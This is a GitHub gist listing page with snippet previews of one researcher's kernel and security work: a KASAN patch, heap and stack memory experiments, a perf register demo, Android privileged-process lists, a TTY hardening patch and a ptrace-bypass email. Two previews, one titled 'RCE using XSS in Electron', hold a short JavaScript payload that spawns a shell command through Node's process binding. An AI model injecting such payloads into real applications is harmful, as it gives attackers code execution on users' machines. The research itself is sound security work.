Skip to content

Instantly share code, notes, and snippets.

@thejh
thejh / gist:c91f9b4e3cc4c58659bb3cd056c4fa40
Created Aug 24, 2018
overzealous kasan stack fixup patch (completely untested)
View gist:c91f9b4e3cc4c58659bb3cd056c4fa40
diff --git a/arch/x86/entry/entry_64.S b/arch/x86/entry/entry_64.S
index 957dfb693ecc..251ed2ca3f04 100644
--- a/arch/x86/entry/entry_64.S
+++ b/arch/x86/entry/entry_64.S
@@ -1673,9 +1673,26 @@ ENTRY(rewind_stack_do_exit)
/* Prevent any naive code from trying to unwind to our caller. */
xorl %ebp, %ebp
+ movq %rdi, %r14
+
@thejh
thejh / gdb-anaheap.py
Created Jul 29, 2018
GDB script for checking memory usage of completely unused pages in free glibc malloc chunks
View gdb-anaheap.py
import os
import struct
# flags are encoded into chunk size
FLAGS_MASK = 0x7
PAGEMAP_PRESENT = 1<<63
PAGEMAP_SWAPPED = 1<<62
main_arena = gdb.parse_and_eval('&main_arena')
bins_per_arena = int(gdb.parse_and_eval(
@thejh
thejh / check.c
Created Jul 29, 2018
unused stack memory experiment
View check.c
// small stack memory usage experiment
// written by Jann Horn
#include <stdint.h>
#include <sys/ptrace.h>
#include <sys/user.h>
#include <fcntl.h>
#include <err.h>
#include <unistd.h>
#include <stdlib.h>
View gist:b8be219d48084630ec0aed41ee71aee2
0x0 Twux 0x7aa7000
0x0 Twux 0x8b4bf000
0x400000 Twux 0x77c9000
0x400000 P-ux 0x11f46000
0x600000 Twux 0x72da000
0x600000 P-u- 0x11f47000L
0x601000 Pwu- 0x11ec8000L
0x1e00000 Twux 0x79fb000
0x1f13000 Pwu- 0x11f7a000L
0x1f14000 Pwu- 0x11f7b000L
@thejh
thejh / perf_sample_regs_intr_demo.c
Created Nov 2, 2016
PERF_SAMPLE_REGS_INTR demo
View perf_sample_regs_intr_demo.c
$ ./perf_sample_regs_intr_demo
data_head is at ff0
rax=0xffffffffffffffff rbp=0x7ffc9ec04170 rsp=0x7ffc9ec040b8 rip=0x4005b0
rax=0xfffffffffffffff7 rbp=0xffffa5fc43efff48 rsp=0xffffa5fc43efff28 rip=0xffffffff97c55f1d
rax=0xfffffffffffffff7 rbp=0x7ffc9ec04170 rsp=0x7ffc9ec040b8 rip=0xffffffff9862ce18
rax=0xffff8fc3ba3b79c0 rbp=0xffffa5fc43efff00 rsp=0xffffa5fc43effef0 rip=0xffffffff97c745c9
rax=0xfffffffffffffff7 rbp=0x7ffc9ec04170 rsp=0x7ffc9ec040b8 rip=0xffffffff9862ce18
rax=0x0 rbp=0xffffa5fc43efff00 rsp=0xffffa5fc43effef8 rip=0xffffffff97c75049
rax=0xfffffffffffffff7 rbp=0x7ffc9ec04170 rsp=0x7ffc9ec040b8 rip=0xffffffff9862ce15
rax=0xffffffffffffffff rbp=0x7ffc9ec04170 rsp=0x7ffc9ec040c0 rip=0x4007d5
@thejh
thejh / gist:6a943fbbd89f81ffa28060dd4f60b390
Created Oct 29, 2016
privileged processes on pixel phones
View gist:6a943fbbd89f81ffa28060dd4f60b390
init root allcaps
ueventd root allcaps
logd CAP_AUDIT_CONTROL CAP_SYSLOG
qseecomd CAP_NET_RAW CAP_SYS_RAWIO CAP_SYS_ADMIN
qseecomd CAP_NET_RAW CAP_SYS_RAWIO CAP_SYS_ADMIN
debuggerd root allcaps
debuggerd64 root allcaps
vold root allcaps
debuggerd64:sig root allcaps
debuggerd:sig root allcaps
View gist:3bac7b2c79cdaaf569c702d9080320ed
var Process = process.binding('process_wrap').Process;
var proc = new Process();
proc.onexit = function(a,b) {};
var env = process.env;
var env_ = [];
for (var key in env) env_.push(key+'='+env[key]);
proc.spawn({file:'/bin/sh',args:['sh','-c','id > /tmp/owned'],cwd:null,windowsVerbatimArguments:false,detached:false,envPairs:env_,stdio:[{type:'ignore'},{type:'ignore'},{type:'ignore'}]});
View 0001-drivers-tty-add-protected_ttys-sysctl.patch
From cd0bd8ae7e4afb8050657b73d65e3ddeccd44b9b Mon Sep 17 00:00:00 2001
From: Jann Horn <jann@thejh.net>
Date: Sat, 12 Dec 2015 02:59:28 +0100
Subject: [PATCH] drivers/tty: add protected_ttys sysctl
This new fs.protected_ttys sysctl can be set to 1 to require
CAP_SYS_ADMIN for the TIOCSTI ioctl (which lets the caller
push input back into the TTY and thereby fake input to other
processes that read from the same TTY).
@thejh
thejh / rce.js
Created Aug 24, 2016
RCE using XSS in Electron
View rce.js
var Process = process.binding('process_wrap').Process;
var proc = new Process();
proc.onexit = function(a,b) {};
var env = process.env;
var env_ = [];
for (var key in env) env_.push(key+'='+env[key]);
proc.spawn({file:'/bin/sh',args:['sh','-c','id > /tmp/owned'],cwd:null,windowsVerbatimArguments:false,detached:false,envPairs:env_,stdio:[{type:'ignore'},{type:'ignore'},{type:'ignore'}]});
View GRKERNSEC_PTRACE_READEXEC bypasses
Date: Sun, 28 Feb 2016 19:08:22 +0100
From: Jann Horn <jann@thejh.net>
To: Brad Spengler <spender@grsecurity.net>
Subject: GRKERNSEC_PTRACE_READEXEC bypasses
Hi!
While writing some new kernel documentation (not yet public, but will probably
soon be under Documentation/security/ptrace_checks.txt), I noticed that
GRKERNSEC_PTRACE_READEXEC has some issues.
You can’t perform that action at this time.